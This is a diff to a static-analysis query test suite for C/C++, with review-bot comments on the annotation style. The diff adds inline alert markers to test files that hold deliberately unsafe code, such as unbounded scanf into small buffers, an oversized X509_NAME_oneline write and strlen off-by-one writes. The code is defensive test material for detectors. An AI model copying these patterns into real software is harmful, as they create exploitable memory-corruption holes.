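Review bot: The two calls newly annotated in `TestFunc`, `funcTest1(); // $ Alert` and `DllMain(); // $ Alert`, carry no `BAD` explanation, unlike `std::runtime_error("msg error"); // BAD // $ Alert` in `funcTest3` in the same hunk. `funcTest1` and `DllMain` are defined outside the hunk, so the reason these call sites are flagged cannot be read from here. I would add a short reason in the same style as the rest of the file, e.g. `funcTest1(); // BAD: <reason the call is flagged> // $ Alert`, and the same for `DllMain()`.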
@@ -49,9 +49,9 @@ int functionWork1b(int retIndex) { char a[10]; int b; int *p = &b; - scanf("%i", &i); // BAD - scanf("%s", a); // BAD - scanf("%i", p); // BAD + scanf("%i", &i); // BAD // $ Alert + scanf("%s", a); // BAD // $ Alert + scanf("%i", p); // BAD // $ Alert if(retIndex == 0) return (int)*a; if(retIndex == 1) @@ -102,9 +102,9 @@ int functionWork2b() { char a[10]; int b; int *p = &b; - scanf("%i", &i); // BAD - scanf("%s", a); // BAD - scanf("%i", p); // BAD + scanf("%i", &i); // BAD // $ Alert + scanf("%s", a); // BAD // $ Alert + scanf("%i", p); // BAD // $ Alert globalVal = i; globalVala = a; globalValp = p; @@ -112,12 +112,12 @@ int functionWork2b() { } int functionWork2b_() { char a[10]; - scanf("%s", a); // BAD + scanf("%s", a); // BAD // $ Alert globalVala2 = a[0]; return 0; } int functionWork3b(int * i) { - scanf("%i", i); // BAD + scanf("%i", i); // BAD // $ Alert return 0; } int functionWork3() { diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-758/semmle/tests/UndefinedOrImplementationDefinedBehavior.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-758/semmle/tests/UndefinedOrImplementationDefinedBehavior.qlref index e178bc348e9b..933f46a7abff 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-758/semmle/tests/UndefinedOrImplementationDefinedBehavior.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-758/semmle/tests/UndefinedOrImplementationDefinedBehavior.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-758/UndefinedOrImplementationDefinedBehavior.ql +query: experimental/Security/CWE/CWE-758/UndefinedOrImplementationDefinedBehavior.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-758/semmle/tests/test.c b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-758/semmle/tests/test.c index 01d8e666cdd8..f05eed27629a 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-758/semmle/tests/test.c 
+++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-758/semmle/tests/test.c @@ -10,10 +10,10 @@ char tmpFunction2(char * buf) } void workFunction_0(char *s, char * buf) { int intA; - intA = tmpFunction1(buf) + tmpFunction2(buf); // BAD + intA = tmpFunction1(buf) + tmpFunction2(buf); // BAD // $ Alert intA = tmpFunction1(buf); //GOOD intA += tmpFunction2(buf); // GOOD - buf[intA] = intA++; // BAD + buf[intA] = intA++; // BAD // $ Alert intA++; buf[intA] = intA; // GOOD } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-783/semmle/tests/OperatorPrecedenceLogicErrorWhenUseBitwiseOrLogicalOperations.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-783/semmle/tests/OperatorPrecedenceLogicErrorWhenUseBitwiseOrLogicalOperations.qlref index 0c3f1c1c6a67..e2b7ace55b93 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-783/semmle/tests/OperatorPrecedenceLogicErrorWhenUseBitwiseOrLogicalOperations.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-783/semmle/tests/OperatorPrecedenceLogicErrorWhenUseBitwiseOrLogicalOperations.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-783/OperatorPrecedenceLogicErrorWhenUseBitwiseOrLogicalOperations.ql +query: experimental/Security/CWE/CWE-783/OperatorPrecedenceLogicErrorWhenUseBitwiseOrLogicalOperations.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-783/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-783/semmle/tests/test.cpp index 479a4e5d6a3a..834ea2719213 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-783/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-783/semmle/tests/test.cpp 
@@ -1,14 +1,14 @@ void testFunction(int i1, int i2, int i3, bool b1, bool b2, bool b3, char c1) { - if(b1||b2&&b3) //BAD + if(b1||b2&&b3) //BAD // $ Alert return; if((b1||b2)&&b3) //GOOD return; if(b1||(b2&&b3)) //GOOD return; - if(b1||b2&i1) //BAD + if(b1||b2&i1) //BAD // $ Alert return; if((b1||b2)&i1) //GOOD return; @@ -16,26 +16,26 @@ void testFunction(int i1, int i2, int i3, bool b1, bool b2, bool b3, char c1) return; if(b1&&b2&0) //GOOD return; - if(b1||b2|i1) //BAD + if(b1||b2|i1) //BAD // $ Alert return; if((b1||b2)|i1) //GOOD return; - if(i1|i2&c1) //BAD + if(i1|i2&c1) //BAD // $ Alert return; if((i1|i2)&i3) //GOOD return; - if(i1^i2&c1) //BAD + if(i1^i2&c1) //BAD // $ Alert return; if((i1^i2)&i3) //GOOD return; - if(i1|i2^c1) //BAD + if(i1|i2^c1) //BAD // $ Alert return; if((i1|i2)^i3) //GOOD return; - if(b1|b2^b3) //BAD + if(b1|b2^b3) //BAD // $ Alert return; if((b1|b2)^b3) //GOOD return; diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/AccessOfMemoryLocationAfterEndOfBufferUsingStrlen.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/AccessOfMemoryLocationAfterEndOfBufferUsingStrlen.qlref index 6ba005d087a6..c3aaa7d65a08 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/AccessOfMemoryLocationAfterEndOfBufferUsingStrlen.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/AccessOfMemoryLocationAfterEndOfBufferUsingStrlen.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-788/AccessOfMemoryLocationAfterEndOfBufferUsingStrlen.ql +query: experimental/Security/CWE/CWE-788/AccessOfMemoryLocationAfterEndOfBufferUsingStrlen.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/OperatorPrecedenceLogicErrorWhenUseBoolType.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/OperatorPrecedenceLogicErrorWhenUseBoolType.qlref
index 5189abcce5d1..47c4540803df 100644
--- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/OperatorPrecedenceLogicErrorWhenUseBoolType.qlref
+++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/OperatorPrecedenceLogicErrorWhenUseBoolType.qlref
@@ -1 +1,2 @@
-experimental/Security/CWE/CWE-783/OperatorPrecedenceLogicErrorWhenUseBoolType.ql
+query: experimental/Security/CWE/CWE-783/OperatorPrecedenceLogicErrorWhenUseBoolType.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/test.c b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/test.c
index a204aa4db29e..1fb546aa6965 100644
--- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/test.c
+++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/test.c
@@ -13,15 +13,15 @@ void strlen_test1(){ struct buffers buffAll; struct buffers * buffAll1; - buff1[strlen(buff1)]=0; // BAD - buffAll.array[strlen(buffAll.array)]=0; // BAD - buffAll.pointer[strlen(buffAll.pointer)]=0; // BAD - buffAll1->array[strlen(buffAll1->array)]=0; // BAD - buffAll1->pointer[strlen(buffAll1->pointer)]=0; // BAD - globalBuff1.array[strlen(globalBuff1.array)]=0; // BAD - globalBuff1.pointer[strlen(globalBuff1.pointer)]=0; // BAD - globalBuff2->array[strlen(globalBuff2->array)]=0; // BAD - globalBuff2->pointer[strlen(globalBuff2->pointer)]=0; // BAD + buff1[strlen(buff1)]=0; // BAD // $ Alert[cpp/access-memory-location-after-end-buffer-strlen] + buffAll.array[strlen(buffAll.array)]=0; // BAD // $ Alert[cpp/access-memory-location-after-end-buffer-strlen] + buffAll.pointer[strlen(buffAll.pointer)]=0; // BAD // $ Alert[cpp/access-memory-location-after-end-buffer-strlen] + buffAll1->array[strlen(buffAll1->array)]=0; // BAD // $ Alert[cpp/access-memory-location-after-end-buffer-strlen] + buffAll1->pointer[strlen(buffAll1->pointer)]=0; // BAD // $ Alert[cpp/access-memory-location-after-end-buffer-strlen] + globalBuff1.array[strlen(globalBuff1.array)]=0; // BAD // $ Alert[cpp/access-memory-location-after-end-buffer-strlen] + globalBuff1.pointer[strlen(globalBuff1.pointer)]=0; // BAD // $ Alert[cpp/access-memory-location-after-end-buffer-strlen] + globalBuff2->array[strlen(globalBuff2->array)]=0; // BAD // $ Alert[cpp/access-memory-location-after-end-buffer-strlen] + globalBuff2->pointer[strlen(globalBuff2->pointer)]=0; // BAD // $ Alert[cpp/access-memory-location-after-end-buffer-strlen] } void strlen_test2(){ diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/test.cpp index f08d2a45757f..7f12385e68f0 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/test.cpp 
+++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/test.cpp @@ -7,13 +7,13 @@ void testFunction() int i1,i2,i3; bool b1,b2,b3; char c1,c2,c3; - b1 = -b2; //BAD + b1 = -b2; //BAD // $ Alert[cpp/operator-precedence-logic-error-when-use-bool-type] b1 = !b2; //GOOD - b1++; //BAD - ++b1; //BAD - if(i1=tmpFunc()!=i2) //BAD + b1++; //BAD // $ Alert[cpp/operator-precedence-logic-error-when-use-bool-type] + ++b1; //BAD // $ Alert[cpp/operator-precedence-logic-error-when-use-bool-type] + if(i1=tmpFunc()!=i2) //BAD // $ Alert[cpp/operator-precedence-logic-error-when-use-bool-type] return; - if(i1=tmpFunc()!=11) //BAD + if(i1=tmpFunc()!=11) //BAD // $ Alert[cpp/operator-precedence-logic-error-when-use-bool-type] return; if((i1=tmpFunc())!=i2) //GOOD return; diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-805/semmle/tests/BufferAccessWithIncorrectLengthValue.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-805/semmle/tests/BufferAccessWithIncorrectLengthValue.qlref index 6cbb55272112..e92957d34a80 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-805/semmle/tests/BufferAccessWithIncorrectLengthValue.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-805/semmle/tests/BufferAccessWithIncorrectLengthValue.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-805/BufferAccessWithIncorrectLengthValue.ql +query: experimental/Security/CWE/CWE-805/BufferAccessWithIncorrectLengthValue.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-805/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-805/semmle/tests/test.cpp index 26c33abab65d..6ba895650472 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-805/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-805/semmle/tests/test.cpp 
@@ -24,7 +24,7 @@ bool badTest1(SSL *ssl,char *text) char buf[256]; if( peer = SSL_get_peer_certificate(ssl)) { - X509_NAME_oneline(X509_get_subject_name(peer),buf,1024); // BAD + X509_NAME_oneline(X509_get_subject_name(peer),buf,1024); // BAD // $ Alert if((char*)strcasestr(buf,text)) return true; } return false; diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/semmle/tests/MemoryUnsafeFunctionScan.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/semmle/tests/MemoryUnsafeFunctionScan.cpp index 09506cbc0878..1c0f53829356 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/semmle/tests/MemoryUnsafeFunctionScan.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/semmle/tests/MemoryUnsafeFunctionScan.cpp @@ -16,7 +16,7 @@ int main(int argc, char **argv) // BAD, do not use scanf without specifying a length first char buf1[10]; - scanf("%s", buf1); + scanf("%s", buf1); // $ Alert // GOOD, length is specified. The length should be one less than the size of the destination buffer, since the last character is the NULL terminator. char buf2[20]; @@ -25,7 +25,7 @@ int main(int argc, char **argv) // BAD, do not use scanf without specifying a length first char file[10]; - fscanf(file, "%s", buf2); + fscanf(file, "%s", buf2); // $ Alert // GOOD, with 'sscanf' the input can be checked first and enough room allocated [FALSE POSITIVE] if (argc >= 1) @@ -33,7 +33,7 @@ int main(int argc, char **argv) char *src = argv[0]; char *dest = (char *)malloc(strlen(src) + 1); - sscanf(src, "%s", dest); + sscanf(src, "%s", dest); // $ Alert } return 0; diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/semmle/tests/MemoryUnsafeFunctionScan.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/semmle/tests/MemoryUnsafeFunctionScan.qlref index 428d988a161d..b8d5ea8dbe32 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/semmle/tests/MemoryUnsafeFunctionScan.qlref 
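Review bot: The third hunk of MemoryUnsafeFunctionScan.cpp marks `sscanf(src, "%s", dest);` with a plain `// $ Alert`, although the comment above that block describes the case as GOOD and tags it `[FALSE POSITIVE]`. Inline expectations can record a known false positive explicitly, so I would write `sscanf(src, "%s", dest); // $ SPURIOUS: Alert`; the test still passes, and the annotation stops presenting an unwanted result as an intended detection. The `// $ Alert` annotations in the two earlier hunks (`scanf` into `buf1`, `fscanf` into `buf2`) agree with their BAD comments and need no change. `main`'s body starts outside these hunks.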
+++ b/cpp/ql/test/experimental/query-tests/Security/CWE/semmle/tests/MemoryUnsafeFunctionScan.qlref
@@ -1 +1,2 @@
-experimental/Security/CWE/CWE-120/MemoryUnsafeFunctionScan.ql
\ No newline at end of file
+query: experimental/Security/CWE/CWE-120/MemoryUnsafeFunctionScan.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/library-tests/c11_generic/PrintAST.qlref b/cpp/ql/test/library-tests/c11_generic/PrintAST.qlref
index 6f85a6dbe693..645e39136f5b 100644
--- a/cpp/ql/test/library-tests/c11_generic/PrintAST.qlref
+++ b/cpp/ql/test/library-tests/c11_generic/PrintAST.qlref
@@ -1 +1 @@
-semmle/code/cpp/PrintAST.ql
+query: semmle/code/cpp/PrintAST.ql
diff --git a/cpp/ql/test/library-tests/conversions/consistency.qlref b/cpp/ql/test/library-tests/conversions/consistency.qlref
index 183c1b1ffe14..e4b883a499af 100644
--- a/cpp/ql/test/library-tests/conversions/consistency.qlref
+++ b/cpp/ql/test/library-tests/conversions/consistency.qlref
@@ -1 +1 @@
-semmle/code/cpp/ASTConsistency.ql
+query: semmle/code/cpp/ASTConsistency.ql
diff --git a/cpp/ql/test/library-tests/extraction_errors/CompilerErrors.qlref b/cpp/ql/test/library-tests/extraction_errors/CompilerErrors.qlref
index fd0c287c00dc..85408a38cdfe 100644
--- a/cpp/ql/test/library-tests/extraction_errors/CompilerErrors.qlref
+++ b/cpp/ql/test/library-tests/extraction_errors/CompilerErrors.qlref
@@ -1 +1 @@
-Telemetry/CompilerErrors.ql
+query: Telemetry/CompilerErrors.ql
diff --git a/cpp/ql/test/library-tests/extraction_errors/DatabaseQuality.qlref b/cpp/ql/test/library-tests/extraction_errors/DatabaseQuality.qlref
index b2c536f00d70..9e81d9d21602 100644
--- a/cpp/ql/test/library-tests/extraction_errors/DatabaseQuality.qlref
+++ b/cpp/ql/test/library-tests/extraction_errors/DatabaseQuality.qlref
@@ -1 +1 @@
-Telemetry/DatabaseQuality.ql
+query: Telemetry/DatabaseQuality.ql
diff --git a/cpp/ql/test/library-tests/extraction_errors/ExtractionMetrics.qlref b/cpp/ql/test/library-tests/extraction_errors/ExtractionMetrics.qlref
index 80547fdfd981..1e0348487e8a 100644
--- a/cpp/ql/test/library-tests/extraction_errors/ExtractionMetrics.qlref
+++ b/cpp/ql/test/library-tests/extraction_errors/ExtractionMetrics.qlref
@@ -1 +1 @@
-Telemetry/ExtractionMetrics.ql
\ No newline at end of file
+query: Telemetry/ExtractionMetrics.ql
diff --git a/cpp/ql/test/library-tests/extraction_errors/SucceededIncludes.qlref b/cpp/ql/test/library-tests/extraction_errors/SucceededIncludes.qlref
index 055b6af49a75..949a011697de 100644
--- a/cpp/ql/test/library-tests/extraction_errors/SucceededIncludes.qlref
+++ b/cpp/ql/test/library-tests/extraction_errors/SucceededIncludes.qlref
@@ -1 +1 @@
-Telemetry/SucceededIncludes.ql
+query: Telemetry/SucceededIncludes.ql
diff --git a/cpp/ql/test/library-tests/ir/ir/aliased_ssa_consistency_unsound.qlref b/cpp/ql/test/library-tests/ir/ir/aliased_ssa_consistency_unsound.qlref
index 0c9100ea0432..4e659ed8cc91 100644
--- a/cpp/ql/test/library-tests/ir/ir/aliased_ssa_consistency_unsound.qlref
+++ b/cpp/ql/test/library-tests/ir/ir/aliased_ssa_consistency_unsound.qlref
@@ -1 +1 @@
-semmle/code/cpp/ir/IRConsistency.ql
\ No newline at end of file
+query: semmle/code/cpp/ir/IRConsistency.ql
diff --git a/cpp/ql/test/library-tests/ir/ir/aliased_ssa_ssa_consistency_unsound.qlref b/cpp/ql/test/library-tests/ir/ir/aliased_ssa_ssa_consistency_unsound.qlref
index d0a29f0641af..11a9e601a070 100644
--- a/cpp/ql/test/library-tests/ir/ir/aliased_ssa_ssa_consistency_unsound.qlref
+++ b/cpp/ql/test/library-tests/ir/ir/aliased_ssa_ssa_consistency_unsound.qlref
@@ -1 +1 @@
-semmle/code/cpp/ir/implementation/aliased_ssa/internal/SSAConsistency.ql
\ No newline at end of file
+query: semmle/code/cpp/ir/implementation/aliased_ssa/internal/SSAConsistency.ql
diff --git a/cpp/ql/test/library-tests/ir/ir/raw_consistency.qlref b/cpp/ql/test/library-tests/ir/ir/raw_consistency.qlref
index eb7cc77b3164..6c4fdc743eb7 100644
--- a/cpp/ql/test/library-tests/ir/ir/raw_consistency.qlref
+++ b/cpp/ql/test/library-tests/ir/ir/raw_consistency.qlref
@@ -1 +1 @@
-semmle/code/cpp/ir/implementation/raw/IRConsistency.ql
\ No newline at end of file
+query: semmle/code/cpp/ir/implementation/raw/IRConsistency.ql
diff --git a/cpp/ql/test/library-tests/ir/ir/unaliased_ssa_consistency_unsound.qlref b/cpp/ql/test/library-tests/ir/ir/unaliased_ssa_consistency_unsound.qlref
index 1d0a35439328..a7c519f7dcd2 100644
--- a/cpp/ql/test/library-tests/ir/ir/unaliased_ssa_consistency_unsound.qlref
+++ b/cpp/ql/test/library-tests/ir/ir/unaliased_ssa_consistency_unsound.qlref
@@ -1 +1 @@
-semmle/code/cpp/ir/implementation/unaliased_ssa/IRConsistency.ql
\ No newline at end of file
+query: semmle/code/cpp/ir/implementation/unaliased_ssa/IRConsistency.ql
diff --git a/cpp/ql/test/library-tests/ir/ir/unaliased_ssa_ssa_consistency_unsound.qlref b/cpp/ql/test/library-tests/ir/ir/unaliased_ssa_ssa_consistency_unsound.qlref
index fd03efbc2674..3ac4894b14eb 100644
--- a/cpp/ql/test/library-tests/ir/ir/unaliased_ssa_ssa_consistency_unsound.qlref
+++ b/cpp/ql/test/library-tests/ir/ir/unaliased_ssa_ssa_consistency_unsound.qlref
@@ -1 +1 @@
-semmle/code/cpp/ir/implementation/unaliased_ssa/internal/SSAConsistency.ql
\ No newline at end of file
+query: semmle/code/cpp/ir/implementation/unaliased_ssa/internal/SSAConsistency.ql
diff --git a/cpp/ql/test/library-tests/ir/ssa/aliased_ssa_consistency_unsound.qlref b/cpp/ql/test/library-tests/ir/ssa/aliased_ssa_consistency_unsound.qlref
index 0c9100ea0432..4e659ed8cc91 100644
--- a/cpp/ql/test/library-tests/ir/ssa/aliased_ssa_consistency_unsound.qlref
+++ b/cpp/ql/test/library-tests/ir/ssa/aliased_ssa_consistency_unsound.qlref
@@ -1 +1 @@
-semmle/code/cpp/ir/IRConsistency.ql
\ No newline at end of file
+query: semmle/code/cpp/ir/IRConsistency.ql
diff --git a/cpp/ql/test/library-tests/ir/ssa/aliased_ssa_ir_unsound.qlref b/cpp/ql/test/library-tests/ir/ssa/aliased_ssa_ir_unsound.qlref
index 7d4b2950a35a..981d95d44004 100644
--- a/cpp/ql/test/library-tests/ir/ssa/aliased_ssa_ir_unsound.qlref
+++ b/cpp/ql/test/library-tests/ir/ssa/aliased_ssa_ir_unsound.qlref
@@ -1 +1 @@
-semmle/code/cpp/ir/PrintIR.ql
\ No newline at end of file
+query: semmle/code/cpp/ir/PrintIR.ql
diff --git a/cpp/ql/test/library-tests/ir/ssa/aliased_ssa_ssa_consistency_unsound.qlref b/cpp/ql/test/library-tests/ir/ssa/aliased_ssa_ssa_consistency_unsound.qlref
index d0a29f0641af..11a9e601a070 100644
--- a/cpp/ql/test/library-tests/ir/ssa/aliased_ssa_ssa_consistency_unsound.qlref
+++ b/cpp/ql/test/library-tests/ir/ssa/aliased_ssa_ssa_consistency_unsound.qlref
@@ -1 +1 @@
-semmle/code/cpp/ir/implementation/aliased_ssa/internal/SSAConsistency.ql
\ No newline at end of file
+query: semmle/code/cpp/ir/implementation/aliased_ssa/internal/SSAConsistency.ql
diff --git a/cpp/ql/test/library-tests/ir/ssa/unaliased_ssa_consistency_unsound.qlref b/cpp/ql/test/library-tests/ir/ssa/unaliased_ssa_consistency_unsound.qlref
index 1d0a35439328..a7c519f7dcd2 100644
--- a/cpp/ql/test/library-tests/ir/ssa/unaliased_ssa_consistency_unsound.qlref
+++ b/cpp/ql/test/library-tests/ir/ssa/unaliased_ssa_consistency_unsound.qlref
@@ -1 +1 @@
-semmle/code/cpp/ir/implementation/unaliased_ssa/IRConsistency.ql
\ No newline at end of file
+query: semmle/code/cpp/ir/implementation/unaliased_ssa/IRConsistency.ql
diff --git a/cpp/ql/test/library-tests/ir/ssa/unaliased_ssa_ir_unsound.qlref b/cpp/ql/test/library-tests/ir/ssa/unaliased_ssa_ir_unsound.qlref
index 3f7764440366..ad25a00416be 100644
--- a/cpp/ql/test/library-tests/ir/ssa/unaliased_ssa_ir_unsound.qlref
+++ b/cpp/ql/test/library-tests/ir/ssa/unaliased_ssa_ir_unsound.qlref
@@ -1 +1 @@ -semmle/code/cpp/ir/implementation/unaliased_ssa/PrintIR.ql \ No newline at end of file +query: semmle/code/cpp/ir/implementation/unaliased_ssa/PrintIR.ql diff --git a/cpp/ql/test/library-tests/ir/ssa/unaliased_ssa_ssa_consistency_unsound.qlref b/cpp/ql/test/library-tests/ir/ssa/unaliased_ssa_ssa_consistency_unsound.qlref index fd03efbc2674..3ac4894b14eb 100644 --- a/cpp/ql/test/library-tests/ir/ssa/unaliased_ssa_ssa_consistency_unsound.qlref +++ b/cpp/ql/test/library-tests/ir/ssa/unaliased_ssa_ssa_consistency_unsound.qlref @@ -1 +1 @@ -semmle/code/cpp/ir/implementation/unaliased_ssa/internal/SSAConsistency.ql \ No newline at end of file +query: semmle/code/cpp/ir/implementation/unaliased_ssa/internal/SSAConsistency.ql diff --git a/cpp/ql/test/library-tests/lossy_pointer_cast/lossy_pointer_cast.c b/cpp/ql/test/library-tests/lossy_pointer_cast/lossy_pointer_cast.c index 8f76cdb42f20..4c91a819add6 100644 --- a/cpp/ql/test/library-tests/lossy_pointer_cast/lossy_pointer_cast.c +++ b/cpp/ql/test/library-tests/lossy_pointer_cast/lossy_pointer_cast.c @@ -6,11 +6,11 @@ void f(void) { long long int z; z = (long long int)p1; // OK: long long int is big enough - i = (short int)p2; // Bad: short is too small + i = (short int)p2; // Bad: short is too small // $ Alert i = (short int)(long long int)p3; // OK: we assume they know what // they are doing if they go // via a large-enough type - i = (short int)(void *)p4; // Bad: Going via a pointer type is + i = (short int)(void *)p4; // Bad: Going via a pointer type is // $ Alert // not convincing } diff --git a/cpp/ql/test/library-tests/lossy_pointer_cast/lossy_pointer_cast.qlref b/cpp/ql/test/library-tests/lossy_pointer_cast/lossy_pointer_cast.qlref index d202b53c6aa6..69e313c34ee4 100644 --- a/cpp/ql/test/library-tests/lossy_pointer_cast/lossy_pointer_cast.qlref +++ b/cpp/ql/test/library-tests/lossy_pointer_cast/lossy_pointer_cast.qlref 
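Review bot: On the `p4` line of lossy_pointer_cast.c the annotation is inserted in the middle of a two-line comment, so the file now reads `// Bad: Going via a pointer type is // $ Alert` followed by `// not convincing` on the next line. The explanation of why the narrowing cast is flagged becomes hard to read once the marker splits the sentence. I would keep the sentence whole and put the marker last, e.g. `i = (short int)(void *)p4; // Bad: going via a pointer type is not convincing // $ Alert`, and drop the continuation line. The `p2` line in the same hunk already follows that shape. `f`'s body starts outside the hunk.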
@@ -1 +1,2 @@ -Likely Bugs/Conversion/LossyPointerCast.ql +query: Likely Bugs/Conversion/LossyPointerCast.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/library-tests/subscript_operator/PrintAST.qlref b/cpp/ql/test/library-tests/subscript_operator/PrintAST.qlref index 6fcb30ac7a6e..645e39136f5b 100644 --- a/cpp/ql/test/library-tests/subscript_operator/PrintAST.qlref +++ b/cpp/ql/test/library-tests/subscript_operator/PrintAST.qlref @@ -1 +1 @@ -semmle/code/cpp/PrintAST.ql \ No newline at end of file +query: semmle/code/cpp/PrintAST.ql diff --git a/cpp/ql/test/library-tests/syntax-zoo/aliased_ssa_consistency.qlref b/cpp/ql/test/library-tests/syntax-zoo/aliased_ssa_consistency.qlref index 0c9100ea0432..4e659ed8cc91 100644 --- a/cpp/ql/test/library-tests/syntax-zoo/aliased_ssa_consistency.qlref +++ b/cpp/ql/test/library-tests/syntax-zoo/aliased_ssa_consistency.qlref @@ -1 +1 @@ -semmle/code/cpp/ir/IRConsistency.ql \ No newline at end of file +query: semmle/code/cpp/ir/IRConsistency.ql diff --git a/cpp/ql/test/library-tests/syntax-zoo/raw_consistency.qlref b/cpp/ql/test/library-tests/syntax-zoo/raw_consistency.qlref index eb7cc77b3164..6c4fdc743eb7 100644 --- a/cpp/ql/test/library-tests/syntax-zoo/raw_consistency.qlref +++ b/cpp/ql/test/library-tests/syntax-zoo/raw_consistency.qlref @@ -1 +1 @@ -semmle/code/cpp/ir/implementation/raw/IRConsistency.ql \ No newline at end of file +query: semmle/code/cpp/ir/implementation/raw/IRConsistency.ql diff --git a/cpp/ql/test/library-tests/syntax-zoo/unaliased_ssa_consistency.qlref b/cpp/ql/test/library-tests/syntax-zoo/unaliased_ssa_consistency.qlref index 1d0a35439328..a7c519f7dcd2 100644 --- a/cpp/ql/test/library-tests/syntax-zoo/unaliased_ssa_consistency.qlref +++ b/cpp/ql/test/library-tests/syntax-zoo/unaliased_ssa_consistency.qlref 
@@ -1 +1 @@ -semmle/code/cpp/ir/implementation/unaliased_ssa/IRConsistency.ql \ No newline at end of file +query: semmle/code/cpp/ir/implementation/unaliased_ssa/IRConsistency.ql diff --git a/cpp/ql/test/library-tests/types/integral_types_ms/integral_type.qlref b/cpp/ql/test/library-tests/types/integral_types_ms/integral_type.qlref index e5e0e3cdf432..6b61b46a179a 100644 --- a/cpp/ql/test/library-tests/types/integral_types_ms/integral_type.qlref +++ b/cpp/ql/test/library-tests/types/integral_types_ms/integral_type.qlref @@ -1 +1 @@ -../integral_types/integral_type.ql +query: ../integral_types/integral_type.ql diff --git a/cpp/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref b/cpp/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref index 9d7833eccae7..dc898fca718c 100644 --- a/cpp/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref +++ b/cpp/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref @@ -1 +1 @@ -AlertSuppression.ql +query: AlertSuppression.ql diff --git a/cpp/ql/test/query-tests/Architecture/FeatureEnvy/FeatureEnvy.qlref b/cpp/ql/test/query-tests/Architecture/FeatureEnvy/FeatureEnvy.qlref index cbb26c9c3bf3..0c7c0f33b1eb 100644 --- a/cpp/ql/test/query-tests/Architecture/FeatureEnvy/FeatureEnvy.qlref +++ b/cpp/ql/test/query-tests/Architecture/FeatureEnvy/FeatureEnvy.qlref @@ -1 +1,2 @@ -Architecture/FeatureEnvy.ql +query: Architecture/FeatureEnvy.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Architecture/FeatureEnvy/a.cpp b/cpp/ql/test/query-tests/Architecture/FeatureEnvy/a.cpp index 588364e73096..059908b34869 100644 --- a/cpp/ql/test/query-tests/Architecture/FeatureEnvy/a.cpp +++ b/cpp/ql/test/query-tests/Architecture/FeatureEnvy/a.cpp @@ -7,7 +7,7 @@ void local3(void) { } void local4(void) { } void local5(void) { } -void f1(void) { +void f1(void) { // $ Alert g(); h(); i(); 
